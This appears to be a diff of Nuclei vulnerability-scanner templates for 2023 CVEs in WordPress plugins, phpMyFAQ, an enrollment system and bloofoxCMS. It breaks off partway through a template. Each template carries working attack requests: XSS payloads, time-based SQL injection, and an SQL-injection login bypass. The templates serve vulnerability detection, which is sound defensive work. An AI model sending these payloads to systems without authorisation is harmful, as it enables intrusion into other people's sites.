matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "<title>Index of /fp-content</title>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2023-1263
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1263
|
||||||
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure
|
||||||
|
- https://wordpress.org/plugins/cmp-coming-soon-maintenance/
|
||||||
|
remediation: Fixed in version 4.1.7
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2023-1263
|
||||||
|
cwe-id: CWE-862
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/"
|
||||||
|
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=cmp_get_post_detail&id=1
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"img":'
|
||||||
|
- '"date":'
|
||||||
|
- '"title":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- application/json
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-1408
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Video List Manager <= 1.7 - SQL Injection
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
|
||||||
|
- https://wordpress.org/plugins/video-list-manager/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1408
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2023-1408
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 15s
|
||||||
|
GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration_2>=7'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains_all(body_2, "Edit Video","Youtube</option>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-1780
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
||||||
|
remediation: Fixed in version 4.5.3
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1780
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2023-1780
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "re not allowed to view")'
|
||||||
|
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-1880
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Phpmyfaq v3.1.11 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
|
||||||
|
remediation: Fixed in 3.1.12 Version.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1880
|
||||||
|
- https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"phpmyfaq"
|
||||||
|
tags: cve,cve2023,xss,phpmyfaq
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2023-2009
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pretty Url <= 1.5.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2009
|
||||||
|
- https://wordpress.org/plugins/pretty-url/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 3
|
||||||
|
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss
|
||||||
|
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log=((username))&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
|
||||||
|
- 'contains(body_3, "prettyurls")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
internal: true
|
||||||
|
name: nonce
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'name="_wpnonce" value="([0-9a-z]+)" />'
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-2779
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Super Socializer < 7.13.52 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
||||||
|
remediation: Fixed in version 7.13.52
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2779
|
||||||
|
- https://wordpress.org/plugins/super-socializer/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 2
|
||||||
|
publicwww-query: "/wp-content/plugins/super-socializer/"
|
||||||
|
tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(header_2, "text/html")'
|
||||||
|
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2023-27922
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Newsletter < 7.6.9 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-27922
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "text/html")'
|
||||||
|
- 'contains(tolower(body_2), "_newsletter_")'
|
||||||
|
- 'contains(body_2, "><script>alert(document_domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,54 @@
|
||||||
|
id: CVE-2023-29439
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
|
||||||
|
reference:
|
||||||
|
- https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
|
||||||
|
- https://wordpress.org/plugins/foogallery/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-29439
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-29439
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
publicwww-query: "/wp-content/plugins/foogallery/"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'data-gallery_id="\"><script>alert(document.domain)</script>"'
|
||||||
|
- 'foogallery-image-edit-modal'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-30868
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51507
|
||||||
|
- https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-30868
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cve-id: CVE-2023-30868
|
||||||
|
cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,43 @@
|
||||||
|
id: CVE-2023-3219
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: EventON Lite < 2.1.2 - Arbitrary File Download
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
|
||||||
|
to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
|
||||||
|
remediation: Fixed in version 2.1.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3219
|
||||||
|
- https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
|
||||||
|
- https://wordpress.org/plugins/eventon-lite/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/eventon-lite/"
|
||||||
|
tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "BEGIN:VCALENDAR"
|
||||||
|
- "END:VCALENDAR"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/Calendar"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,41 @@
|
||||||
|
id: CVE-2023-33584
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51501
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-33584
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-33584
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,sqli,exploitdb,unauth,enrollment
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /enrollment/ajax.php?action=login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username='+or+1%3D1+%23&password={{randstr}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /enrollment/index.php?page=home HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34751
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34751
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34751
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34752
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34752
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34752
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34753
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
|
||||||
|
reference:
|
||||||
|
- https://www.bloofox.com
|
||||||
|
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34753
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-34753
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
fofa-query: "Powered by bloofoxCMS"
|
||||||
|
max-request: 2
|
||||||
|
tags: cve,cve2023,sqli,bloofox,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/index.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&action=login
|
||||||
|
|
||||||
|
- |
|
||||||
|
@timeout: 10s
|
||||||
|
POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=6
|
||||||
|
- contains(header_2, "text/html")
|
||||||
|
- contains(body_2, 'bloofoxCMS Admincenter')
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-34755
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: bloofoxCMS v0.5.2.1 - SQL Injection
|
||||||
|
